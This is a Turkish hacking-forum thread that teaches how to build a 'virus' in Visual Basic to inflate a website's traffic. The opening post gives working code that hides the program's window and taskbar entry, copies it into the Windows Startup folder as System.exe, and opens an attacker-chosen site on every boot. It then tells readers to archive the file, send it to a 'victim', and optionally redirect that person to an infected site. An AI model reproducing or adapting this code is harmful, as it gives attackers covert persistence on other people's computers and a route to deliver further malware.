Site hiti artırma virüsü yapımı

torun1993

Kıdemli Üye
24 Haz 2013
2,302
1
GünahŞehri
Arkadaşlar,merhaba.Bugün sizlerle Visual Basic ile bir virüs yapacağız.Bu öyle birşey olacak ki.Adam bunu tıkladığında bilgisayarına yerleşecek ve bilgisayarı her açtığında sizin belirlediğiniz siteyi açacak.Bu yolla kendinize ziyaretçi akını yapabilirsiniz.

1-)Visual basic programını açtık.Şimdi formun adını(caption) "System" yapıyoruz
2-)Properties penceresinde formun "Visible" ve "ShowinTheTaskbar" özelliklerini "False" Yapıyoruz.
3-)Formu açıyoruz ve alttaki kodları forma aynen yapıştırıyoruz.


Kod:
Private Sub Form_Load()
On Error Resume Next
App.TaskVisible = False
Me.Hide
TaskVisible = False
FileCopy "[COLOR="Red"]VİRÜSÜNÜZÜN ADI.exe[/COLOR]", "[COLOR="Red"]C:********s and SettingsAll UsersStart MenuProgramlarBaşlangıçSystem.exe[/COLOR]"
Shell ("[COLOR="Red"]C:Program FilesInternet Exploreriexplore.exe [/COLOR][COLOR="Red"]www.sizinsiteniz.com[/COLOR]"), vbNormalFocus
End Sub

4-)Kodda kırmızı yazılan kısmı kendinize göre ayarlayın
5-)Şimdi programınızı yazdırın.Virüsünüzün adı ne olacaksa kaydederkende aynı ismi kullanın büyük küçük harfe dikkat edin.
6-)Şimdi virüsümüz yazıldı.Bir klasör açın ve sadece bu yarattıgınız virüsü içine atın.Şimdi bu klasörüde yeni bir winrara atın.


İşlem Tamam! Artık Winrar da yaptığımıza göre virüs hazır.Bunu kurbana gönderin açtığı anda virüs bulaşacak ve siteniz hit alacak.Veya adamı virüslü bir siteye yönlendirebilirsiniz illa kendi siteniz olması şart değil.

The End
 
Son düzenleme:

QAWZSE

Üye
27 Şub 2012
109
0
Açtırdığımız site explorer olarak mı açılıyor yoksa gizliden mi hallediyor ?
 

torun1993

Kıdemli Üye
24 Haz 2013
2,302
1
GünahŞehri
Teşekkürler Usta.

rica ederim ..

Açtırdığımız site explorer olarak mı açılıyor yoksa gizliden mi hallediyor ?

xp haricinde çalışmıyor virüs kendiniz diğer işletim sistemlerinde de çalışabilmesi için uygun girdileri ekleyebilirsiniz . İnterneti açtığı zaman direk olarak kendi sitemiz çıkıyor

Kodlar bu konu altında isimli konunun altına açmanız gerekirdi.

ne demek istediğinizi anlamadım .
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.